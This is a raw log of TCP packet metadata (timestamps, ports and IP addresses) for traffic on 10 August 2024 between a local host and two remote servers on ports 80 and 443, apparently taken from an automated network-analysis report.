Aug 10, 2024 16:12:24.494081974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494134903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494220972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494421959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494447947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494461060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494514942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494514942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494514942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494565010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494579077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494591951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494632959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494645119 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494645119 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494645119 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494647980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494682074 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494754076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494769096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494781971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494796038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494894981 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494894981 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494894981 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.494923115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494936943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494951010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.494966030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.495035887 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.495035887 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.495217085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.495245934 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.495266914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.495280981 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.495289087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.495311022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.495332003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.495353937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.495378017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.495394945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.495394945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.495394945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.495490074 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.536184072 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.536200047 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.536509991 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.536518097 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.536700964 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.538674116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.538738966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.538769960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.538803101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.538816929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.538836956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.538868904 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.538891077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.538902044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.538918972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.538935900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.538938999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.538981915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.560452938 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.560478926 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.560632944 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.560632944 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.560647011 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.560713053 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.561077118 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.561090946 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.561150074 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.561155081 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.561322927 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.561599970 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.561613083 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.561708927 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.561713934 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.561975002 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.562119007 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.562134027 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.562212944 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.562212944 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.562217951 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.562278032 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.562540054 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.562552929 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.562613010 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.562618017 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.562664986 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.562664986 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.563690901 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.563709021 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.563771963 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.563785076 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.563800097 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.563833952 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.564162016 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.564176083 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.564246893 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.564251900 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.564397097 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.568114042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568170071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568171024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.568203926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568248987 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.568253040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568303108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568334103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568361998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.568367958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568372011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.568434954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568470955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568494081 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.568526983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568577051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568591118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.568609953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568641901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568656921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.568677902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.568728924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569205999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569258928 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569259882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569289923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569314003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569324017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569355965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569370985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569394112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569406033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569437981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569454908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569492102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569503069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569554090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569576025 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569603920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569607019 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569636106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569668055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569684029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569700003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569710970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569752932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569801092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569832087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569864988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569881916 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569900036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569919109 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569931984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569963932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569976091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.569997072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.569999933 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570028067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570051908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570060015 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570066929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570091009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570106030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570122957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570127010 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570156097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570187092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570219040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570235014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570250988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570260048 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570281982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570313931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570318937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570331097 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570344925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570353031 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570377111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570408106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570472002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570493937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570525885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570538998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570563078 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570589066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570638895 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570755005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570786953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570802927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570818901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570838928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570883036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570911884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570926905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570935011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.570980072 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.570986032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571017981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571046114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571077108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571078062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571106911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571110010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571122885 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571158886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571192026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571204901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571223021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571225882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571254969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571276903 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571285963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571317911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571335077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571348906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571360111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571386099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571397066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571413994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571445942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571460009 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571479082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571482897 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571511984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571536064 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.571542978 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.571592093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572112083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572144032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572165966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572179079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572197914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572230101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572280884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572280884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572313070 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572345018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572381973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572391987 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572395086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572443008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572475910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572498083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572513103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572540998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572591066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572592020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572623968 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572628975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572655916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572688103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572701931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572750092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572783947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572803020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572819948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572851896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572868109 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572884083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572916985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572926998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.572948933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572981119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.572999001 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.573043108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573075056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573086977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.573106050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573120117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.573137999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573141098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.573168993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573200941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573216915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.573232889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573246956 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.573263884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573297024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573307037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.573329926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573363066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.573414087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582037926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582060099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582084894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582098961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582113028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582128048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582144022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582144022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582144022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582144022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582151890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582169056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582180023 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582184076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582195997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582200050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582215071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582230091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582245111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582246065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582261086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582274914 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582274914 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582329035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582329035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582479954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582565069 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582601070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582644939 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582674026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582689047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582704067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582746983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582746983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582746983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582796097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582818031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582834005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582849026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582864046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582879066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582885981 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582885981 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582896948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582915068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582927942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582943916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582958937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582973957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.582988024 CEST	80	49740	147.45.44.104	192.168.2.4
